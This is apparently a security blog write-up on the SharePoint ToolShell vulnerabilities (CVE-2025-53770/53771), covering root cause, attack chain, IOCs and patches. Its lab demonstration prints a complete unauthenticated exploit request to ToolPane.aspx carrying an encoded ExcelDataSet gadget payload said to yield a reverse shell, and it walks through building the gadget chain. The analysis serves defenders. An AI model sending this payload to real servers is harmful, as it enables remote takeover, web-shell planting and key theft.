CVE-2025-53770/53771: ToolShell Unauthenticated RCE via Unsafe Deserialization

Attack Visualization

Introduction

In July 2025, Microsoft disclosed and patched a critical remote code execution (RCE) vulnerability in Microsoft SharePoint Server, CVE-2025-53770, commonly referred to as ToolShell.

This wasn’t just a “lab-only” proof of concept. The vulnerability was already being actively exploited in the wild before the patch dropped. Both opportunistic and targeted intrusions were observed, impacting government agencies and large enterprise environments.

Microsoft rated the vulnerability as Critical with a CVSS 3.1 base score of 9.8, reflecting its ease of exploitation and the high impact of successful compromise. Attackers exploited it to:

• Deploy persistent ASPX web shells

• Steal cryptographic keys (e.g., MachineKey)

• Forge authentication tokens to impersonate users

• Pivot deeper into enterprise and government networks

What is Microsoft SharePoint?

Microsoft SharePoint is a web-based collaboration and document management platform, widely deployed in both enterprise and government settings. It enables:

• File sharing and content management

• Workflow automation

• Integration with Microsoft 365

Two main deployment models exist:

1. SharePoint Online: Hosted in Microsoft’s cloud and automatically updated (Not Vulnerable)

2. SharePoint Server (on-premises) : Maintained by an organization’s IT team, often customized with third-party add-ons

While SharePoint’s flexibility makes it invaluable for productivity, its complex attack surface and frequent internet exposure have historically made it a prime target for exploitation.

CVE Summary

CVE ID	CVE-2025-53770 (ToolShell)
CVSS v3.1A	9.8 (Critical)
Impact	Unauthenticated Remote Code Execution
Vector	Malicious request triggers unsafe deserialization of untrusted data
Affected Versions	Subscription Edition < 16.0.18526.20508 SharePoint Server 2019 < 16.0.10417.20037 SharePoint 2016 (all versions) SharePoint 2013 (all versions)
Exploited in Wild	Yes
Patched in	SE → KB 5002768 2019 → KB 5002754 2016 → KB 5002760 2013 → KB 5002763
Discovered by	Microsoft Security Response Center (MSRC) + industry partners
Remediation	1- Apply the latest cumulative update for your SharePoint Server version as listed above.2- If patching is delayed, immediately: Restrict SharePoint access from the public internet. Monitor for suspicious requests to vulnerable endpoints. Hunt for known IOCs from Microsoft, CISA, and security vendors. 3- Reference Microsoft’s official advisory for CVE-2025-53770: https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770

What is insecure deserialization

• Serialization: Converting an in-memory object into a storable/transmittable format (e.g., binary, Base64)

• Deserialization: Reversing that process to recreate the object in memory

Safe deserialization only processes trusted, validated data. Unsafe deserialization occurs when the application accepts serialized data from untrusted sources without validation.

Dangers:

• Serialized data can contain instructions that trigger code execution during deserialization

• An attacker can craft payloads that instantiate arbitrary classes or trigger “gadget chains” already present in the application’s assemblies

In ToolShell’s case: A SharePoint component deserializes untrusted HTTP request data before authentication. By sending a malicious payload, attackers load gadget chains that execute commands on the server without logging in.

Root Cause

• Vulnerable builds of SharePoint accept serialized data from an HTTP request and pass it directly to a general-purpose .NET deserializer

• No type checks or validation are performed before object instantiation

This deserializer can:

• Instantiate arbitrary classes present in the application’s assemblies (“gadgets”)

• Trigger special methods during object construction or deserialization callbacks

• Execute attacker-controlled code paths

Why this is critical

• Runs before authentication: The vulnerable handler is reachable without valid credentials.

• Gadget chains exist in SharePoint’s massive codebase, making RCE possible without dropping custom DLLs.

• No user interaction required, purely server-side exploitation.

CVE-2025-53770 is the deserialization flaw. CVE-2025-53771 is a separate authentication bypass that attackers chain to expand exploitability.

Impact

CVE-2025-53770 affects default deployments of Microsoft SharePoint Server in vulnerable versions, without requiring any custom configuration changes. While the vulnerability is tied to a specific endpoint handling serialized data, it does not require valid credentials or elevated permissions, an unauthenticated attacker can trigger it remotely.

This means that any internet-exposed SharePoint Server running a vulnerable build could potentially be compromised through a single malicious HTTP request. Once exploited, attackers gain the ability to:

• Execute arbitrary code under the SharePoint application pool account.

• Deploy persistent web shells for long-term access.

• Steal sensitive data, including MachineKey values, which can be used to forge authentication tokens and impersonate other users.

• Move laterally within the network by leveraging the compromised SharePoint server’s trust relationships.

Importantly, exploitation does not rely on user interaction, phishing, or chained vulnerabilities. It abuses unsafe deserialization logic in a core SharePoint component, making it an ideal candidate for automated mass exploitation against unpatched systems.

Now lets get into the technical aspects shall we ?

CVE-2025-53771: The Referrer Header Bypass

Microsoft’s initial patch for CVE-2025-49706 tried to block unauthenticated access to ToolPane.aspx by verifying that the Referer header both pointed to SignOut.aspx and that the requested path ended exactly in "ToolPane.aspx".

How it was bypassed: Attackers noticed that adding a trailing slash, requesting "ToolPane.aspx/" caused the EndsWith check to fail, thus bypassing the patch with minimal modification. Microsoft formally recognized this as CVE-2025-53771 and later strengthened the logic to validate against an explicit list of allowed paths instead of a simple suffix check

Why ToolPane.aspx Was Targeted

What is ToolPane.aspx?

ToolPane.aspx is a legacy SharePoint component responsible for configuring page layouts and web parts. It’s privileged, expecting only authenticated admins to use it in regular operations.

Why attackers went after it:

Because it inherently allows manipulation of page content and integration points, compromising it can lead to highly impactful operations, such as dropping shells or executing code, especially when authentication is bypassed. The endpoint is also commonly exposed in on-prem SharePoint deployments and tied into many internal APIs.

When the attacker reaches ToolPane.aspx, they submit a crafted POST request with several parameters. Two critical ones are:

• MSOtlPn_Uri : Points the toolpane to a resource URI. In the exploit payload, this parameter is typically harmless-looking but is manipulated to maintain the structure SharePoint expects, keeping the request from being flagged as invalid.

• MSOtlPn_DWP : The real payload carrier. This parameter embeds a serialized .NET object, often compressed or encoded, that represents the malicious gadget chain.

Understanding Gadget Chains

At the core of CVE-2025-53770 is unsafe deserialization. But deserialization alone isn’t magic- what makes it dangerous is the existence of gadget chains.

A gadget is a legitimate class in the SharePoint/.NET ecosystem that has methods triggered during the deserialization process, like constructors, property setters, or ISerializable interfaces. By chaining multiple gadgets together - a gadget chain - an attacker builds a predictable path of code execution leading to arbitrary commands running on the server.

For ToolShell, the most common gadget chains leveraged came from:

• System.Data.DataSet and related XML parsers

• Scorecard:ExcelDataSet gadgets within SharePoint assemblies

• ObjectDataProvider types that allow reflective code execution

These gadgets are already present in a default SharePoint install, meaning attackers don’t need to upload or register any external assemblies.

How BinaryFormatter Works

The .NET BinaryFormatter is a serialization engine that converts objects into byte streams for storage or transmission and then back into objects during deserialization.

Here’s the problem: BinaryFormatter does not validate the type or content of the object being deserialized. If an attacker sends a maliciously crafted object, the application will deserialize and rebuild it without any safety checks.

Attack Chain

Although CVE-2025-53770 itself is the unsafe deserialization bug, attackers chained it with CVE-2025-53771 (authentication bypass) to widen the target surface.

Step 1 - Initial Access - ToolPane.aspx Endpoint & Referrer Spoofing

• Attackers send a crafted HTTP POST request to:

  POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
  Referer: /_layouts/SignOut.aspx

• The spoofed Referer bypasses certain authentication checks (CVE-2025-53771)

• Grants access to functionality intended only for authenticated users

Step 2 - Payload Deployment - Dropping spinstall0.aspx

• With authenticated access to the vulnerable ToolPane.aspx endpoint, the attacker exploits an insecure deserialization vulnerability by submitting a malicious payload in the POST body. SharePoint deserializes attacker-controlled data without validation, leading to the execution of embedded commands. This results in dropping a stealthy ASPX web shell (e.g., spinstall0.aspx) into a directory such as:

  C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

• This web shell grants persistent remote access to the server.

Step 3 - Credential Access - Extracting MachineKey Values

• The shell employs reflective loading (System.Reflection.Assembly.Load()) to access and expose:

  • ValidationKey

  • DecryptionKey

  • Cryptographic algorithm and compatibility settings

• These secrets are used to craft authenticated-looking payloads.

Step 4 - Payload Generation - Crafting Signed __VIEWSTATE

• Using the stolen keys, attackers generate legitimately signed __VIEWSTATE payloads containing malicious serialized objects (e.g., CompressedDataTable using Scorecard:ExcelDataSet gadgets).

• Tools like ysoserial or custom serializers are used for payload generation.

Step 5 - Remote Code Execution - Deserialization Trigger

• SharePoint deserializes the crafted ViewState in the w3wp.exe process, executing gadget-based code.

• Common actions include:

  • Writing secondary shells

  • Executing PowerShell

  • Exfiltrating data

  • Disabling protection mechanisms

• Observed in the wild starting mid-July 2025.

Step 6 - Persistence & Lateral Movement

• The attacker maintains access with web shells and forged tokens.

• They can impersonate users without needing credentials, move laterally, and in some cases, deploy ransomware like Warlock. U.S. government agencies were confirmed victims

Observed IOCs

• File name: spinstall0.aspx

• SHA256 hash: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

• Referer: /_layouts/SignOut.aspx

• POST to /_layouts/15/ToolPane.aspx?DisplayMode=Edit

• GET request to /_layouts/15/spinstall0.aspx

• Process name: w3wp.exe spawning encoded PowerShell

• IP addresses: 107.191.58[.]76, 104.238.159[.]149, 96.9.125[.]147, 103.186.30[.]186

• File path: C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx

Demonstration

For this demonstration, I replicated the vulnerable environment in my home lab. If you want to build the same setup, you can follow a SharePoint installation guide instead of me explaining every setup detail here. installation guide

Vulnerable windows version: https://archive.org/details/WinServer2019x64 Vulnerable SharePoint Version: https://www.microsoft.com/en-us/download/details.aspx?id=57462

Disable Windows Defender and the firewall before proceeding. you can use defender control for that

Create a new SharePoint site and bind it to a unique port, this will serve as your target environment for testing.

POC Using Metasploit

there’s a pending Metasploit module that automates this process and delivers a reverse shell.

MetaSploit Module: https://github.com/rapid7/metasploit-framework/pull/20409#commits-pushed-d2a1f7b

A 401 Unauthorized response is normal, the payload still runs server-side.

POST /_layouts/15/ToolPane.aspx/afvwtfokcm?DisplayMode=Edit&chakoguctccwnpq=/ToolPane.aspx HTTP/1.1
Host: 10.3.10.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86
Referer: /_layouts/SignOut.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: 3760

MSOTlPn_Uri=http%3a//10.3.10.11/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP=%3c%25%40%20Register%20Tagprefix%3d%22mhlweesjnqpt%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%3c%25%40%20Register%20Tagprefix%3d%22uzduqwmr%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%3cmhlweesjnqpt%3aUpdateProgress%3e%0a%20%20%20%20%3cProgressTemplate%3e%0a%20%20%20%20%20%20%3cuzduqwmr%3aExcelDataSet%20CompressedDataTable%3d%22H4sIAL%2bCq2gAA9VYbXObSBJO7uq27rL37f6ASp8TC5BJIpfsKkACoUjYIAGCrVQtL2OBNIDCi5D0l%2b5P3T%2b56wFZku04TrK32TtchtFMd093z9MPM7x4%2beLFi3/DRZ7k%2bvuf4KZMtlmOorOekzuvGwZKszCJL8/PKPL3uiEUOC9SdBmjIk8d/LpxU7g49D6g7TRZovjSfffOYT32Ld1pnyPqfecvxPg/TmxWtwnKyVx/m0V44gUocn6GVi%2b8vZVSJ3r5koz99Ge4/euv3U12kVUijU2E4%2byy2awbFxtoB3m%2bumi1yrI8K9tnSTpvMRRFt2bjUW32TjbKfJj1slmk8d5a9iYKvTTJktv8jZdEFyD3ppZqNkL/spnhxPHiEgfNq1eNBvECYRShOG/EToROxxu12oWc7SO7bOZpgQ79eoaEIk1BdZR4Dkb7YWKWXMQ0OLDCaDPdrtBd92EoSEIPNaIwvva8IoWYKbDsbO5%2bFbGbFLGP/Oap5p32fZ8X4RqHpYfwI9lnHHkolqFPBYq9J2U%2bP33u7/JtPs%2bd7JO/9lafDhkieSNTXjb3OBESjJGXA/CyMwnFKA29s1GY5b/Sv/xyCqUJSteQnexMjnOUxg4%2b629WDsmGmTqrFUp/ZQ4KJnLPdPlslGRikkZODgqvG8ex74E61b5lb9/d0rTPUk7b%2bfj6MFcY%2b0mZ1U5euwuIhTRv0mQd%2bmTemxRlkBiHhCgC5FGZpMvvcKFNu7ft9%2bxbx2%2b/PUdt9uPHQ0z3EvRfKOSPH5uNvFokWFgn3pIFa97HZetJzLSeAU0l8AXwVeN7NN2rkNahRA719BlT99VrbyoWuHr1E%2bGafza7PpDPPL2oH070XbxR69QmntO5m%2bjNmt5XY/dAKccIu4eSbewdJNw0dVx85Jc0Ka9TQFXFDHupwMmEwInnCNYljDOU5o8IovuwHA%2b0Gj7Pq2/AaO7AYh7J2P8KNn689N0HBXt9e1qgj0vnBzjZ%2bDyKD572axw9AfYueEqcRj40IKB8Sz3Nkt0xyoPEV4AArnrACGno4HCHuq2T/ueUbxzCH5Cs7EtsDOL7mv0RGQTjF3dc4V9keRrG8%2bZVq%2bxvaU3mOJXjuJsWXO957nCVArlPDIX12hp2J%2bXciIytx%2bC1u6Co0YIrxsJ5ORL4nm9uKH82xDcmi/2ZtrXMMpNFnraizcqicowMbe0wRnFjym2F6dPWTmfG0%2bVOkfTyurcUq/llldfbeOdLRj5aKmtX2mCrra1cht2Nlj52YW7HHBc609mCzFJnDMrqia5J3/nHTv3BcOVGXiZL9M4COVfCIfhn2rPhzjE7xc1UrX1ecJncV2h3oNFepHfANg26gSuUc31ghKC3mDAGa0id1DbPO9bCa1tTY6FMrc31dEzZU%2b78GlTqZBk9t20UPhf0XIYuLciDN/cPc/I6pmyT3nHcmOPnocId8smC/CazTYUict6WHdiQPy/Ciyr%2bGR9AewfxH%2b1G3Mak8ymaKWCTKvS2BjlhY4gx9xhl7ZF8h7/XOoGKOq8wwc3Jbdk7affJnYcYOU74P4%2bxCmU0Y079O%2b/J%2bBBT3zY32GZEyjYUEksAeHlrzSqsyhDv0p7JQ55gmu/3jzmyJHKPyv7a2vILwAf4CToCl4O/mcWIC0fS5yPTmjsDjfJ6yXq06wNWx8X1FOKbJufj3rwcMcbaXuK%2bH/ODiaHdXpsehcyVpPTVth9786GhiVODw7N%2bHkxoIzV0Q1PbYjKKjHN7wkXyQKEgz5QsdARZMHRNp9WhsRlZem44tCHqurJxBBYj8GUY8kvbLL9sU7UGVYyMktucKpLmN%2baqwpHQB3nJiGEM8wyNfSlY2z1u4JoG5Uid5Vgd97gdf8CFJhmAKz8ALphCLleWuVmhSKxwNpE6mS0Z2w/U0aZmspQXL9cHjsFDbEd3HHNeTE0jtwBTE5ONXPpJX3%2br/rAuoOWwillNyKNf9fV%2bc2zVOvADjfUkXbZmyg54J3QHS8mXxK0NfNmPNcCzj32RyBi811awaw4zpLIEE7E903Q04/E0EnNbXeXwO3EZ7doyadwzH83Hc6oM//3eWPym9U5P4hPdWNsi1RoR3zNueMxBbBQWw%2b3%2bSC4Yif8bc2sSDmyGXUOOV1Yb3oGD4dpijJ23hffVHR5/z/fcvCTIGrkzZeG2h5ljyhCLjb1YIdjvKPVcMGc5V9tG5g%2bMrT2lC3tmUF4kZuCb6ptETxnZM6y7TI7dBR0qOz9QzDGtLPrseKdh4DdWmFvKD9p3SD3Cy/zq%2bTyX1k1VW0bNnYLG1XVLOF7oHDESGRHUyMKXwNeQVUj9wZoM3chew34F8CNmzmwVVOPLAPY4GuwVvMpWXXObY03qbOCa%2blBlNgH0VTUoGMoK/Auq/KqrqWP6BdQWWdutsKSJHvZwVf%2bqBnFX3EFB7beN3CY1W/ZJvcK2ZSz3ju/oquZNmhr2yoqblJqbzslDqgi9x34FFvkp4RlfCD5XM4/6PqiWQUzfnLwrID%2bxG3UAz3gBewXVizrwnlR2sljn/YP4mb3e475VzbEJL9R7kzqOqu0f9hmCWgUrVS9ljn7kHx9UeinwOTXeyXOV6eQe4dHJV8fnEAPjY3xDN1Z345A/%2bPCt8ZxsJiSJuD8QD/Pe%2befMYN/yh%2b%2bhluMKQ/P9U6t8HtZrkIy6rf3R5wtnqdbXH6a69alU3h%2bNTg47p0fX5lW3dV/wifNi62sOjN3WN56TH5z1Ww8P%2byefGFqHbwz77xCtkw8R3daDDyNXr37%2bD4KK1Ts4FgAA%22%20DataTable-CaseSensitive%3d%22true%22%20runat%3d%22server%22/%3e%0a%20%20%20%20%3c/ProgressTemplate%3e%0a%20%20%3c/mhlweesjnqpt%3aUpdateProgress%3e%0a

Understanding the Payload

1- payload Creation

• payload.encoded contains your Metasploit payload (e.g., a reverse shell stub).

• .generate() constructs a TypeConfuseDelegate gadget chain, formatted with LosFormatter, which embeds instructions for command execution.

• vprint_line dumps the generated binary chain in hex for debugging.

• Then it’s converted to Base64

• Here, typeconfusedelegate_gadget_b64 is the already built malicious payload, Base64 encoded.

• DataSetWrapper.generate() takes that Base64 string and wraps it inside a fake serialized DataSet object so that SharePoint’s deserializer accepts it.

• Finally, .to_binary_s converts the object into a raw binary stream ready for delivery.

SharePoint doesn’t deserialize arbitrary objects for security reasons. However, System.Data.DataSet objects are implicitly trusted, so attackers wrap the malicious payload in a DataSet wrapper. This trick allows the deserializer to process and execute the payload without raising red flags.

2- Building the Schema

• This is constructing an XML schema describing a DataSet.

The key Part is the msdata:DataType

• This tells the deserializer that the DataSet contains a .NET collection wrapping a LosFormatter object.

Why LosFormatter? Because it’s a trusted type in ASP.NET that can deserialize arbitrary objects , perfect for executing your gadget payload.

3- Building the Diffgram

• Embeds the Base64 gadget payload (nested_gadget_b64) inside an ObjectDataProvider.

• Calls .Deserialize on that object when the XML is deserialized.

• The ExpandedWrapperOfLosFormatterObjectDataProvider trick is crucial because:

  • This object acts as a “bridge,” automatically calling .Deserialize() during the deserialization process, which loads your malicious gadget chain into memory.

  • SharePoint will read this object.

  • Automatically call the Deserialize method.

  • And load your malicious object graph into memory.

• Think of this as: You’re building a blueprint that says:

“Hey SharePoint, here’s a DataSet with a trusted structure. When you parse it, call Deserialize on this object, and here’s some data for you to process.”

4- Serializing with BinaryFormatter

• BinaryFormatter now takes the XML schema and diffgram and serializes them into a binary stream.

• This binary output is what you finally send to the vulnerable SharePoint endpoint.

Why BinaryFormatter? Because SharePoint’s backend implicitly trusts BinaryFormatter for DataSet deserialization. Once it parses the schema, it reconstructs your malicious object graph and triggers execution.

Payload Execution Flow

1. Initial RCE Vector / Gadget Base

   • Use the TypeConfuseDelegate gadget to create the core malicious payload.

   • This payload is first serialized and base64-encoded, this is your typeconfusedelegate_gadget_b64.

2. Wrapping in System.Data.DataSet

   • Call DataSetWrapper.generate(nested_gadget_b64) which:

     • Generates a custom XML schema (schema variable).

     • Builds a diffgram payload containing your malicious gadget inside an <ObjectDataProvider> call that invokes .Deserialize().

     • Packages them into a BinaryFormatter stream.

3. Sending the Payload

   • The final binary stream from the DataSetWrapper is sent to the vulnerable SharePoint endpoint that will deserialize it automatically.

   • This endpoint depends on the vulnerable path (often /_layouts/15/ToolPane.aspx.

4. Deserialization and Trigger

   • When the SharePoint server processes the binary payload, it:

     • Deserializes the crafted System.Data.DataSet object.

     • Resolves the ExpandedWrapper type embedded in the schema.

     • Executes the LosFormatter.Deserialize call, passing the inner gadget as input.

   • This executes the malicious chain, resulting in Remote Code Execution (RCE).

Summary

CVE-2025-53770, also known as ToolShell, is a critical RCE vulnerability in Microsoft SharePoint Server caused by unsafe deserialization using the .NET BinaryFormatter. It was actively exploited in the wild before Microsoft released a patch, often chained with CVE-2025-53771, an authentication bypass flaw, to expand its reach.

The vulnerability arises because SharePoint accepts unvalidated serialized objects in HTTP requests. Attackers exploit existing gadget chains within default SharePoint assemblies to execute arbitrary commands without authentication. Once compromised, servers often saw dropped web shells (spinstall0.aspx), stolen cryptographic keys (like MachineKey), forged authentication tokens, and deeper network intrusions.